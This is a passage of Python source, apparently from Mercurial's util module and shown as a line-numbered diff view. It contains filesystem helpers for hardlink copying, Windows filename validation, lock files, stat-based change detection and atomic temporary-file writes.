1751 # stat of copied file is ambiguous to original one
1753 # stat of copied file is ambiguous to original one
1752 advanced = (
1754 advanced = (
1753 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1755 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1754 os.utime(dest, (advanced, advanced))
1756 os.utime(dest, (advanced, advanced))
1755 except shutil.Error as inst:
1757 except shutil.Error as inst:
1756 raise error.Abort(str(inst))
1758 raise error.Abort(str(inst))
1757
1759
1758 def copyfiles(src, dst, hardlink=None, progress=None):
1760 def copyfiles(src, dst, hardlink=None, progress=None):
1759 """Copy a directory tree using hardlinks if possible."""
1761 """Copy a directory tree using hardlinks if possible."""
1760 num = 0
1762 num = 0
1761
1763
1762 def settopic():
1764 def settopic():
1763 if progress:
1765 if progress:
1764 progress.topic = _('linking') if hardlink else _('copying')
1766 progress.topic = _('linking') if hardlink else _('copying')
1765
1767
1766 if os.path.isdir(src):
1768 if os.path.isdir(src):
1767 if hardlink is None:
1769 if hardlink is None:
1768 hardlink = (os.stat(src).st_dev ==
1770 hardlink = (os.stat(src).st_dev ==
1769 os.stat(os.path.dirname(dst)).st_dev)
1771 os.stat(os.path.dirname(dst)).st_dev)
1770 settopic()
1772 settopic()
1771 os.mkdir(dst)
1773 os.mkdir(dst)
1772 for name, kind in listdir(src):
1774 for name, kind in listdir(src):
1773 srcname = os.path.join(src, name)
1775 srcname = os.path.join(src, name)
1774 dstname = os.path.join(dst, name)
1776 dstname = os.path.join(dst, name)
1775 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1777 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1776 num += n
1778 num += n
1777 else:
1779 else:
1778 if hardlink is None:
1780 if hardlink is None:
1779 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1781 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1780 os.stat(os.path.dirname(dst)).st_dev)
1782 os.stat(os.path.dirname(dst)).st_dev)
1781 settopic()
1783 settopic()
1782
1784
1783 if hardlink:
1785 if hardlink:
1784 try:
1786 try:
1785 oslink(src, dst)
1787 oslink(src, dst)
1786 except (IOError, OSError):
1788 except (IOError, OSError):
1787 hardlink = False
1789 hardlink = False
1788 shutil.copy(src, dst)
1790 shutil.copy(src, dst)
1789 else:
1791 else:
1790 shutil.copy(src, dst)
1792 shutil.copy(src, dst)
1791 num += 1
1793 num += 1
1792 if progress:
1794 if progress:
1793 progress.increment()
1795 progress.increment()
1794
1796
1795 return hardlink, num
1797 return hardlink, num
1796
1798
1797 _winreservednames = {
1799 _winreservednames = {
1798 'con', 'prn', 'aux', 'nul',
1800 'con', 'prn', 'aux', 'nul',
1799 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1801 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1800 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1802 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1801 }
1803 }
1802 _winreservedchars = ':*?"<>|'
1804 _winreservedchars = ':*?"<>|'
1803 def checkwinfilename(path):
1805 def checkwinfilename(path):
1804 r'''Check that the base-relative path is a valid filename on Windows.
1806 r'''Check that the base-relative path is a valid filename on Windows.
1805 Returns None if the path is ok, or a UI string describing the problem.
1807 Returns None if the path is ok, or a UI string describing the problem.
1806
1808
1807 >>> checkwinfilename(b"just/a/normal/path")
1809 >>> checkwinfilename(b"just/a/normal/path")
1808 >>> checkwinfilename(b"foo/bar/con.xml")
1810 >>> checkwinfilename(b"foo/bar/con.xml")
1809 "filename contains 'con', which is reserved on Windows"
1811 "filename contains 'con', which is reserved on Windows"
1810 >>> checkwinfilename(b"foo/con.xml/bar")
1812 >>> checkwinfilename(b"foo/con.xml/bar")
1811 "filename contains 'con', which is reserved on Windows"
1813 "filename contains 'con', which is reserved on Windows"
1812 >>> checkwinfilename(b"foo/bar/xml.con")
1814 >>> checkwinfilename(b"foo/bar/xml.con")
1813 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1815 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1814 "filename contains 'AUX', which is reserved on Windows"
1816 "filename contains 'AUX', which is reserved on Windows"
1815 >>> checkwinfilename(b"foo/bar/bla:.txt")
1817 >>> checkwinfilename(b"foo/bar/bla:.txt")
1816 "filename contains ':', which is reserved on Windows"
1818 "filename contains ':', which is reserved on Windows"
1817 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1819 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1818 "filename contains '\\x07', which is invalid on Windows"
1820 "filename contains '\\x07', which is invalid on Windows"
1819 >>> checkwinfilename(b"foo/bar/bla ")
1821 >>> checkwinfilename(b"foo/bar/bla ")
1820 "filename ends with ' ', which is not allowed on Windows"
1822 "filename ends with ' ', which is not allowed on Windows"
1821 >>> checkwinfilename(b"../bar")
1823 >>> checkwinfilename(b"../bar")
1822 >>> checkwinfilename(b"foo\\")
1824 >>> checkwinfilename(b"foo\\")
1823 "filename ends with '\\', which is invalid on Windows"
1825 "filename ends with '\\', which is invalid on Windows"
1824 >>> checkwinfilename(b"foo\\/bar")
1826 >>> checkwinfilename(b"foo\\/bar")
1825 "directory name ends with '\\', which is invalid on Windows"
1827 "directory name ends with '\\', which is invalid on Windows"
1826 '''
1828 '''
1827 if path.endswith('\\'):
1829 if path.endswith('\\'):
1828 return _("filename ends with '\\', which is invalid on Windows")
1830 return _("filename ends with '\\', which is invalid on Windows")
1829 if '\\/' in path:
1831 if '\\/' in path:
1830 return _("directory name ends with '\\', which is invalid on Windows")
1832 return _("directory name ends with '\\', which is invalid on Windows")
1831 for n in path.replace('\\', '/').split('/'):
1833 for n in path.replace('\\', '/').split('/'):
1832 if not n:
1834 if not n:
1833 continue
1835 continue
1834 for c in _filenamebytestr(n):
1836 for c in _filenamebytestr(n):
1835 if c in _winreservedchars:
1837 if c in _winreservedchars:
1836 return _("filename contains '%s', which is reserved "
1838 return _("filename contains '%s', which is reserved "
1837 "on Windows") % c
1839 "on Windows") % c
1838 if ord(c) <= 31:
1840 if ord(c) <= 31:
1839 return _("filename contains '%s', which is invalid "
1841 return _("filename contains '%s', which is invalid "
1840 "on Windows") % stringutil.escapestr(c)
1842 "on Windows") % stringutil.escapestr(c)
1841 base = n.split('.')[0]
1843 base = n.split('.')[0]
1842 if base and base.lower() in _winreservednames:
1844 if base and base.lower() in _winreservednames:
1843 return _("filename contains '%s', which is reserved "
1845 return _("filename contains '%s', which is reserved "
1844 "on Windows") % base
1846 "on Windows") % base
1845 t = n[-1:]
1847 t = n[-1:]
1846 if t in '. ' and n not in '..':
1848 if t in '. ' and n not in '..':
1847 return _("filename ends with '%s', which is not allowed "
1849 return _("filename ends with '%s', which is not allowed "
1848 "on Windows") % t
1850 "on Windows") % t
1849
1851
1850 if pycompat.iswindows:
1852 if pycompat.iswindows:
1851 checkosfilename = checkwinfilename
1853 checkosfilename = checkwinfilename
1852 timer = time.clock
1854 timer = time.clock
1853 else:
1855 else:
1854 checkosfilename = platform.checkosfilename
1856 checkosfilename = platform.checkosfilename
1855 timer = time.time
1857 timer = time.time
1856
1858
1857 if safehasattr(time, "perf_counter"):
1859 if safehasattr(time, "perf_counter"):
1858 timer = time.perf_counter
1860 timer = time.perf_counter
1859
1861
1860 def makelock(info, pathname):
1862 def makelock(info, pathname):
1861 """Create a lock file atomically if possible
1863 """Create a lock file atomically if possible
1862
1864
1863 This may leave a stale lock file if symlink isn't supported and signal
1865 This may leave a stale lock file if symlink isn't supported and signal
1864 interrupt is enabled.
1866 interrupt is enabled.
1865 """
1867 """
1866 try:
1868 try:
1867 return os.symlink(info, pathname)
1869 return os.symlink(info, pathname)
1868 except OSError as why:
1870 except OSError as why:
1869 if why.errno == errno.EEXIST:
1871 if why.errno == errno.EEXIST:
1870 raise
1872 raise
1871 except AttributeError: # no symlink in os
1873 except AttributeError: # no symlink in os
1872 pass
1874 pass
1873
1875
1874 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1876 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1875 ld = os.open(pathname, flags)
1877 ld = os.open(pathname, flags)
1876 os.write(ld, info)
1878 os.write(ld, info)
1877 os.close(ld)
1879 os.close(ld)
1878
1880
1879 def readlock(pathname):
1881 def readlock(pathname):
1880 try:
1882 try:
1881 return readlink(pathname)
1883 return readlink(pathname)
1882 except OSError as why:
1884 except OSError as why:
1883 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1885 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1884 raise
1886 raise
1885 except AttributeError: # no symlink in os
1887 except AttributeError: # no symlink in os
1886 pass
1888 pass
1887 with posixfile(pathname, 'rb') as fp:
1889 with posixfile(pathname, 'rb') as fp:
1888 return fp.read()
1890 return fp.read()
1889
1891
1890 def fstat(fp):
1892 def fstat(fp):
1891 '''stat file object that may not have fileno method.'''
1893 '''stat file object that may not have fileno method.'''
1892 try:
1894 try:
1893 return os.fstat(fp.fileno())
1895 return os.fstat(fp.fileno())
1894 except AttributeError:
1896 except AttributeError:
1895 return os.stat(fp.name)
1897 return os.stat(fp.name)
1896
1898
1897 # File system features
1899 # File system features
1898
1900
1899 def fscasesensitive(path):
1901 def fscasesensitive(path):
1900 """
1902 """
1901 Return true if the given path is on a case-sensitive filesystem
1903 Return true if the given path is on a case-sensitive filesystem
1902
1904
1903 Requires a path (like /foo/.hg) ending with a foldable final
1905 Requires a path (like /foo/.hg) ending with a foldable final
1904 directory component.
1906 directory component.
1905 """
1907 """
1906 s1 = os.lstat(path)
1908 s1 = os.lstat(path)
1907 d, b = os.path.split(path)
1909 d, b = os.path.split(path)
1908 b2 = b.upper()
1910 b2 = b.upper()
1909 if b == b2:
1911 if b == b2:
1910 b2 = b.lower()
1912 b2 = b.lower()
1911 if b == b2:
1913 if b == b2:
1912 return True # no evidence against case sensitivity
1914 return True # no evidence against case sensitivity
1913 p2 = os.path.join(d, b2)
1915 p2 = os.path.join(d, b2)
1914 try:
1916 try:
1915 s2 = os.lstat(p2)
1917 s2 = os.lstat(p2)
1916 if s2 == s1:
1918 if s2 == s1:
1917 return False
1919 return False
1918 return True
1920 return True
1919 except OSError:
1921 except OSError:
1920 return True
1922 return True
1921
1923
1922 try:
1924 try:
1923 import re2
1925 import re2
1924 _re2 = None
1926 _re2 = None
1925 except ImportError:
1927 except ImportError:
1926 _re2 = False
1928 _re2 = False
1927
1929
1928 class _re(object):
1930 class _re(object):
1929 def _checkre2(self):
1931 def _checkre2(self):
1930 global _re2
1932 global _re2
1931 try:
1933 try:
1932 # check if match works, see issue3964
1934 # check if match works, see issue3964
1933 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1935 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1934 except ImportError:
1936 except ImportError:
1935 _re2 = False
1937 _re2 = False
1936
1938
1937 def compile(self, pat, flags=0):
1939 def compile(self, pat, flags=0):
1938 '''Compile a regular expression, using re2 if possible
1940 '''Compile a regular expression, using re2 if possible
1939
1941
1940 For best performance, use only re2-compatible regexp features. The
1942 For best performance, use only re2-compatible regexp features. The
1941 only flags from the re module that are re2-compatible are
1943 only flags from the re module that are re2-compatible are
1942 IGNORECASE and MULTILINE.'''
1944 IGNORECASE and MULTILINE.'''
1943 if _re2 is None:
1945 if _re2 is None:
1944 self._checkre2()
1946 self._checkre2()
1945 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1947 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1946 if flags & remod.IGNORECASE:
1948 if flags & remod.IGNORECASE:
1947 pat = '(?i)' + pat
1949 pat = '(?i)' + pat
1948 if flags & remod.MULTILINE:
1950 if flags & remod.MULTILINE:
1949 pat = '(?m)' + pat
1951 pat = '(?m)' + pat
1950 try:
1952 try:
1951 return re2.compile(pat)
1953 return re2.compile(pat)
1952 except re2.error:
1954 except re2.error:
1953 pass
1955 pass
1954 return remod.compile(pat, flags)
1956 return remod.compile(pat, flags)
1955
1957
1956 @propertycache
1958 @propertycache
1957 def escape(self):
1959 def escape(self):
1958 '''Return the version of escape corresponding to self.compile.
1960 '''Return the version of escape corresponding to self.compile.
1959
1961
1960 This is imperfect because whether re2 or re is used for a particular
1962 This is imperfect because whether re2 or re is used for a particular
1961 function depends on the flags, etc, but it's the best we can do.
1963 function depends on the flags, etc, but it's the best we can do.
1962 '''
1964 '''
1963 global _re2
1965 global _re2
1964 if _re2 is None:
1966 if _re2 is None:
1965 self._checkre2()
1967 self._checkre2()
1966 if _re2:
1968 if _re2:
1967 return re2.escape
1969 return re2.escape
1968 else:
1970 else:
1969 return remod.escape
1971 return remod.escape
1970
1972
1971 re = _re()
1973 re = _re()
1972
1974
1973 _fspathcache = {}
1975 _fspathcache = {}
1974 def fspath(name, root):
1976 def fspath(name, root):
1975 '''Get name in the case stored in the filesystem
1977 '''Get name in the case stored in the filesystem
1976
1978
1977 The name should be relative to root, and be normcase-ed for efficiency.
1979 The name should be relative to root, and be normcase-ed for efficiency.
1978
1980
1979 Note that this function is unnecessary, and should not be
1981 Note that this function is unnecessary, and should not be
1980 called, for case-sensitive filesystems (simply because it's expensive).
1982 called, for case-sensitive filesystems (simply because it's expensive).
1981
1983
1982 The root should be normcase-ed, too.
1984 The root should be normcase-ed, too.
1983 '''
1985 '''
1984 def _makefspathcacheentry(dir):
1986 def _makefspathcacheentry(dir):
1985 return dict((normcase(n), n) for n in os.listdir(dir))
1987 return dict((normcase(n), n) for n in os.listdir(dir))
1986
1988
1987 seps = pycompat.ossep
1989 seps = pycompat.ossep
1988 if pycompat.osaltsep:
1990 if pycompat.osaltsep:
1989 seps = seps + pycompat.osaltsep
1991 seps = seps + pycompat.osaltsep
1990 # Protect backslashes. This gets silly very quickly.
1992 # Protect backslashes. This gets silly very quickly.
1991 seps.replace('\\','\\\\')
1993 seps.replace('\\','\\\\')
1992 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1994 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1993 dir = os.path.normpath(root)
1995 dir = os.path.normpath(root)
1994 result = []
1996 result = []
1995 for part, sep in pattern.findall(name):
1997 for part, sep in pattern.findall(name):
1996 if sep:
1998 if sep:
1997 result.append(sep)
1999 result.append(sep)
1998 continue
2000 continue
1999
2001
2000 if dir not in _fspathcache:
2002 if dir not in _fspathcache:
2001 _fspathcache[dir] = _makefspathcacheentry(dir)
2003 _fspathcache[dir] = _makefspathcacheentry(dir)
2002 contents = _fspathcache[dir]
2004 contents = _fspathcache[dir]
2003
2005
2004 found = contents.get(part)
2006 found = contents.get(part)
2005 if not found:
2007 if not found:
2006 # retry "once per directory" per "dirstate.walk" which
2008 # retry "once per directory" per "dirstate.walk" which
2007 # may take place for each patches of "hg qpush", for example
2009 # may take place for each patches of "hg qpush", for example
2008 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
2010 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
2009 found = contents.get(part)
2011 found = contents.get(part)
2010
2012
2011 result.append(found or part)
2013 result.append(found or part)
2012 dir = os.path.join(dir, part)
2014 dir = os.path.join(dir, part)
2013
2015
2014 return ''.join(result)
2016 return ''.join(result)
2015
2017
2016 def checknlink(testfile):
2018 def checknlink(testfile):
2017 '''check whether hardlink count reporting works properly'''
2019 '''check whether hardlink count reporting works properly'''
2018
2020
2019 # testfile may be open, so we need a separate file for checking to
2021 # testfile may be open, so we need a separate file for checking to
2020 # work around issue2543 (or testfile may get lost on Samba shares)
2022 # work around issue2543 (or testfile may get lost on Samba shares)
2021 f1, f2, fp = None, None, None
2023 f1, f2, fp = None, None, None
2022 try:
2024 try:
2023 fd, f1 = pycompat.mkstemp(prefix='.%s-' % os.path.basename(testfile),
2025 fd, f1 = pycompat.mkstemp(prefix='.%s-' % os.path.basename(testfile),
2024 suffix='1~', dir=os.path.dirname(testfile))
2026 suffix='1~', dir=os.path.dirname(testfile))
2025 os.close(fd)
2027 os.close(fd)
2026 f2 = '%s2~' % f1[:-2]
2028 f2 = '%s2~' % f1[:-2]
2027
2029
2028 oslink(f1, f2)
2030 oslink(f1, f2)
2029 # nlinks() may behave differently for files on Windows shares if
2031 # nlinks() may behave differently for files on Windows shares if
2030 # the file is open.
2032 # the file is open.
2031 fp = posixfile(f2)
2033 fp = posixfile(f2)
2032 return nlinks(f2) > 1
2034 return nlinks(f2) > 1
2033 except OSError:
2035 except OSError:
2034 return False
2036 return False
2035 finally:
2037 finally:
2036 if fp is not None:
2038 if fp is not None:
2037 fp.close()
2039 fp.close()
2038 for f in (f1, f2):
2040 for f in (f1, f2):
2039 try:
2041 try:
2040 if f is not None:
2042 if f is not None:
2041 os.unlink(f)
2043 os.unlink(f)
2042 except OSError:
2044 except OSError:
2043 pass
2045 pass
2044
2046
2045 def endswithsep(path):
2047 def endswithsep(path):
2046 '''Check path ends with os.sep or os.altsep.'''
2048 '''Check path ends with os.sep or os.altsep.'''
2047 return (path.endswith(pycompat.ossep)
2049 return (path.endswith(pycompat.ossep)
2048 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
2050 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
2049
2051
2050 def splitpath(path):
2052 def splitpath(path):
2051 '''Split path by os.sep.
2053 '''Split path by os.sep.
2052 Note that this function does not use os.altsep because this is
2054 Note that this function does not use os.altsep because this is
2053 an alternative of simple "xxx.split(os.sep)".
2055 an alternative of simple "xxx.split(os.sep)".
2054 It is recommended to use os.path.normpath() before using this
2056 It is recommended to use os.path.normpath() before using this
2055 function if need.'''
2057 function if need.'''
2056 return path.split(pycompat.ossep)
2058 return path.split(pycompat.ossep)
2057
2059
2058 def mktempcopy(name, emptyok=False, createmode=None, enforcewritable=False):
2060 def mktempcopy(name, emptyok=False, createmode=None, enforcewritable=False):
2059 """Create a temporary file with the same contents from name
2061 """Create a temporary file with the same contents from name
2060
2062
2061 The permission bits are copied from the original file.
2063 The permission bits are copied from the original file.
2062
2064
2063 If the temporary file is going to be truncated immediately, you
2065 If the temporary file is going to be truncated immediately, you
2064 can use emptyok=True as an optimization.
2066 can use emptyok=True as an optimization.
2065
2067
2066 Returns the name of the temporary file.
2068 Returns the name of the temporary file.
2067 """
2069 """
2068 d, fn = os.path.split(name)
2070 d, fn = os.path.split(name)
2069 fd, temp = pycompat.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
2071 fd, temp = pycompat.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
2070 os.close(fd)
2072 os.close(fd)
2071 # Temporary files are created with mode 0600, which is usually not
2073 # Temporary files are created with mode 0600, which is usually not
2072 # what we want. If the original file already exists, just copy
2074 # what we want. If the original file already exists, just copy
2073 # its mode. Otherwise, manually obey umask.
2075 # its mode. Otherwise, manually obey umask.
2074 copymode(name, temp, createmode, enforcewritable)
2076 copymode(name, temp, createmode, enforcewritable)
2075
2077
2076 if emptyok:
2078 if emptyok:
2077 return temp
2079 return temp
2078 try:
2080 try:
2079 try:
2081 try:
2080 ifp = posixfile(name, "rb")
2082 ifp = posixfile(name, "rb")
2081 except IOError as inst:
2083 except IOError as inst:
2082 if inst.errno == errno.ENOENT:
2084 if inst.errno == errno.ENOENT:
2083 return temp
2085 return temp
2084 if not getattr(inst, 'filename', None):
2086 if not getattr(inst, 'filename', None):
2085 inst.filename = name
2087 inst.filename = name
2086 raise
2088 raise
2087 ofp = posixfile(temp, "wb")
2089 ofp = posixfile(temp, "wb")
2088 for chunk in filechunkiter(ifp):
2090 for chunk in filechunkiter(ifp):
2089 ofp.write(chunk)
2091 ofp.write(chunk)
2090 ifp.close()
2092 ifp.close()
2091 ofp.close()
2093 ofp.close()
2092 except: # re-raises
2094 except: # re-raises
2093 try:
2095 try:
2094 os.unlink(temp)
2096 os.unlink(temp)
2095 except OSError:
2097 except OSError:
2096 pass
2098 pass
2097 raise
2099 raise
2098 return temp
2100 return temp
2099
2101
2100 class filestat(object):
2102 class filestat(object):
2101 """help to exactly detect change of a file
2103 """help to exactly detect change of a file
2102
2104
2103 'stat' attribute is result of 'os.stat()' if specified 'path'
2105 'stat' attribute is result of 'os.stat()' if specified 'path'
2104 exists. Otherwise, it is None. This can avoid preparative
2106 exists. Otherwise, it is None. This can avoid preparative
2105 'exists()' examination on client side of this class.
2107 'exists()' examination on client side of this class.
2106 """
2108 """
2107 def __init__(self, stat):
2109 def __init__(self, stat):
2108 self.stat = stat
2110 self.stat = stat
2109
2111
2110 @classmethod
2112 @classmethod
2111 def frompath(cls, path):
2113 def frompath(cls, path):
2112 try:
2114 try:
2113 stat = os.stat(path)
2115 stat = os.stat(path)
2114 except OSError as err:
2116 except OSError as err:
2115 if err.errno != errno.ENOENT:
2117 if err.errno != errno.ENOENT:
2116 raise
2118 raise
2117 stat = None
2119 stat = None
2118 return cls(stat)
2120 return cls(stat)
2119
2121
2120 @classmethod
2122 @classmethod
2121 def fromfp(cls, fp):
2123 def fromfp(cls, fp):
2122 stat = os.fstat(fp.fileno())
2124 stat = os.fstat(fp.fileno())
2123 return cls(stat)
2125 return cls(stat)
2124
2126
2125 __hash__ = object.__hash__
2127 __hash__ = object.__hash__
2126
2128
2127 def __eq__(self, old):
2129 def __eq__(self, old):
2128 try:
2130 try:
2129 # if ambiguity between stat of new and old file is
2131 # if ambiguity between stat of new and old file is
2130 # avoided, comparison of size, ctime and mtime is enough
2132 # avoided, comparison of size, ctime and mtime is enough
2131 # to exactly detect change of a file regardless of platform
2133 # to exactly detect change of a file regardless of platform
2132 return (self.stat.st_size == old.stat.st_size and
2134 return (self.stat.st_size == old.stat.st_size and
2133 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
2135 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
2134 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
2136 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
2135 except AttributeError:
2137 except AttributeError:
2136 pass
2138 pass
2137 try:
2139 try:
2138 return self.stat is None and old.stat is None
2140 return self.stat is None and old.stat is None
2139 except AttributeError:
2141 except AttributeError:
2140 return False
2142 return False
2141
2143
2142 def isambig(self, old):
2144 def isambig(self, old):
2143 """Examine whether new (= self) stat is ambiguous against old one
2145 """Examine whether new (= self) stat is ambiguous against old one
2144
2146
2145 "S[N]" below means stat of a file at N-th change:
2147 "S[N]" below means stat of a file at N-th change:
2146
2148
2147 - S[n-1].ctime < S[n].ctime: can detect change of a file
2149 - S[n-1].ctime < S[n].ctime: can detect change of a file
2148 - S[n-1].ctime == S[n].ctime
2150 - S[n-1].ctime == S[n].ctime
2149 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2151 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2150 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2152 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2151 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2153 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2152 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2154 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2153
2155
2154 Case (*2) above means that a file was changed twice or more at
2156 Case (*2) above means that a file was changed twice or more at
2155 same time in sec (= S[n-1].ctime), and comparison of timestamp
2157 same time in sec (= S[n-1].ctime), and comparison of timestamp
2156 is ambiguous.
2158 is ambiguous.
2157
2159
2158 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2160 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2159 timestamp is ambiguous".
2161 timestamp is ambiguous".
2160
2162
2161 But advancing mtime only in case (*2) doesn't work as
2163 But advancing mtime only in case (*2) doesn't work as
2162 expected, because naturally advanced S[n].mtime in case (*1)
2164 expected, because naturally advanced S[n].mtime in case (*1)
2163 might be equal to manually advanced S[n-1 or earlier].mtime.
2165 might be equal to manually advanced S[n-1 or earlier].mtime.
2164
2166
2165 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2167 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2166 treated as ambiguous regardless of mtime, to avoid overlooking
2168 treated as ambiguous regardless of mtime, to avoid overlooking
2167 by confliction between such mtime.
2169 by confliction between such mtime.
2168
2170
2169 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2171 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2170 S[n].mtime", even if size of a file isn't changed.
2172 S[n].mtime", even if size of a file isn't changed.
2171 """
2173 """
2172 try:
2174 try:
2173 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2175 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2174 except AttributeError:
2176 except AttributeError:
2175 return False
2177 return False
2176
2178
2177 def avoidambig(self, path, old):
2179 def avoidambig(self, path, old):
2178 """Change file stat of specified path to avoid ambiguity
2180 """Change file stat of specified path to avoid ambiguity
2179
2181
2180 'old' should be previous filestat of 'path'.
2182 'old' should be previous filestat of 'path'.
2181
2183
2182 This skips avoiding ambiguity, if a process doesn't have
2184 This skips avoiding ambiguity, if a process doesn't have
2183 appropriate privileges for 'path'. This returns False in this
2185 appropriate privileges for 'path'. This returns False in this
2184 case.
2186 case.
2185
2187
2186 Otherwise, this returns True, as "ambiguity is avoided".
2188 Otherwise, this returns True, as "ambiguity is avoided".
2187 """
2189 """
2188 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2190 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2189 try:
2191 try:
2190 os.utime(path, (advanced, advanced))
2192 os.utime(path, (advanced, advanced))
2191 except OSError as inst:
2193 except OSError as inst:
2192 if inst.errno == errno.EPERM:
2194 if inst.errno == errno.EPERM:
2193 # utime() on the file created by another user causes EPERM,
2195 # utime() on the file created by another user causes EPERM,
2194 # if a process doesn't have appropriate privileges
2196 # if a process doesn't have appropriate privileges
2195 return False
2197 return False
2196 raise
2198 raise
2197 return True
2199 return True
2198
2200
2199 def __ne__(self, other):
2201 def __ne__(self, other):
2200 return not self == other
2202 return not self == other
2201
2203
2202 class atomictempfile(object):
2204 class atomictempfile(object):
2203 '''writable file object that atomically updates a file
2205 '''writable file object that atomically updates a file
2204
2206
2205 All writes will go to a temporary copy of the original file. Call
2207 All writes will go to a temporary copy of the original file. Call
2206 close() when you are done writing, and atomictempfile will rename
2208 close() when you are done writing, and atomictempfile will rename
2207 the temporary copy to the original name, making the changes
2209 the temporary copy to the original name, making the changes
2208 visible. If the object is destroyed without being closed, all your
2210 visible. If the object is destroyed without being closed, all your
2209 writes are discarded.
2211 writes are discarded.
2210
2212
2211 checkambig argument of constructor is used with filestat, and is
2213 checkambig argument of constructor is used with filestat, and is
2212 useful only if target file is guarded by any lock (e.g. repo.lock
2214 useful only if target file is guarded by any lock (e.g. repo.lock
2213 or repo.wlock).
2215 or repo.wlock).
2214 '''
2216 '''
2215 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2217 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2216 self.__name = name # permanent name
2218 self.__name = name # permanent name
2217 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2219 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2218 createmode=createmode,
2220 createmode=createmode,
2219 enforcewritable=('w' in mode))
2221 enforcewritable=('w' in mode))
2220
2222
2221 self._fp = posixfile(self._tempname, mode)
2223 self._fp = posixfile(self._tempname, mode)
2222 self._checkambig = checkambig
2224 self._checkambig = checkambig
2223
2225
2224 # delegated methods
2226 # delegated methods
2225 self.read = self._fp.read
2227 self.read = self._fp.read
2226 self.write = self._fp.write
2228 self.write = self._fp.write
2227 self.seek = self._fp.seek
2229 self.seek = self._fp.seek
2228 self.tell = self._fp.tell
2230 self.tell = self._fp.tell
2229 self.fileno = self._fp.fileno
2231 self.fileno = self._fp.fileno
2230
2232
2231 def close(self):
2233 def close(self):
2232 if not self._fp.closed:
2234 if not self._fp.closed:
2233 self._fp.close()
2235 self._fp.close()
2234 filename = localpath(self.__name)
2236 filename = localpath(self.__name)
2235 oldstat = self._checkambig and filestat.frompath(filename)
2237 oldstat = self._checkambig and filestat.frompath(filename)
2236 if oldstat and oldstat.stat:
2238 if oldstat and oldstat.stat:
2237 rename(self._tempname, filename)
2239 rename(self._tempname, filename)
2238 newstat = filestat.frompath(filename)
2240 newstat = filestat.frompath(filename)
2239 if newstat.isambig(oldstat):
2241 if newstat.isambig(oldstat):
2240 # stat of changed file is ambiguous to original one
2242 # stat of changed file is ambiguous to original one
2241 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2243 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2242 os.utime(filename, (advanced, advanced))
2244 os.utime(filename, (advanced, advanced))
2243 else:
2245 else:
2244 rename(self._tempname, filename)
2246 rename(self._tempname, filename)
2245
2247
2246 def discard(self):
2248 def discard(self):
2247 if not self._fp.closed:
2249 if not self._fp.closed:
2248 try:
2250 try:
2249 os.unlink(self._tempname)
2251 os.unlink(self._tempname)
2250 except OSError:
2252 except OSError:
2251 pass
2253 pass
2252 self._fp.close()
2254 self._fp.close()
2253
2255
2254 def __del__(self):
2256 def __del__(self):
2255 if safehasattr(self, '_fp'): # constructor actually did something
2257 if safehasattr(self, '_fp'): # constructor actually did something
2256 self.discard()
2258 self.discard()
